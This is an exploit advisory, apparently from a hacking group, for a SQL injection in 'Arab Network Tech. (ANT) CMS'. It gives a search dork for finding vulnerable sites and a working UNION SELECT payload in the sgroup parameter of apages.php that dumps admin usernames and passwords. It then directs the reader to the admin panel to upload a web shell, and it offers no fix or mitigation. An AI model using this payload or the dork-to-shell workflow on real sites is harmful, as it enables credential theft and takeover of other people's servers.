Security

  Text :  


:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::

Exploit Title : Arab Network Tech. (ANT) CMS SQL Injection

Author : Tr0y-x

Script Site : www.antpage.com<http://www.antpage.com/>

Version : All Versions

Tested on : Windows & Linux

Dork : inurl:apages.php

My home : WwW.SeC-WaR.CoM<http://www.sec-war.com/>

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::

=====================================Exploit===============================
=========

www.[Server}.com/[Path]/[SQL<http://www.[server%7d.com/[Path]/[SQL>]

Example

www.[Server}.com/[Path]/apages.php?sgroup=-10+UniOn+AlL+SeLeCt+1,2,concat(u
sername,0x3a,password,0x3a),4,5,6,7,8,9,10+from+admins<http://www.[serve
r%7d.com/[Path]/apages.php?sgroup=-10+UniOn+AlL+SeLeCt+1,2,concat(username,
0x3a,password,0x3a),4,5,6,7,8,9,10+from+admins>--

Then Go to Admin panel Default
www.[Server}.com/[Path]/admin<http://www.[server%7d.com/[Path]/admin>


And Upload Shell xD

Have Fun :D

===========================================================================
=========

Greetz to : Alnjm33 - Predator - XR57 - Ahmadso - Black_Angle & All
Sec-War Members

  References :  

None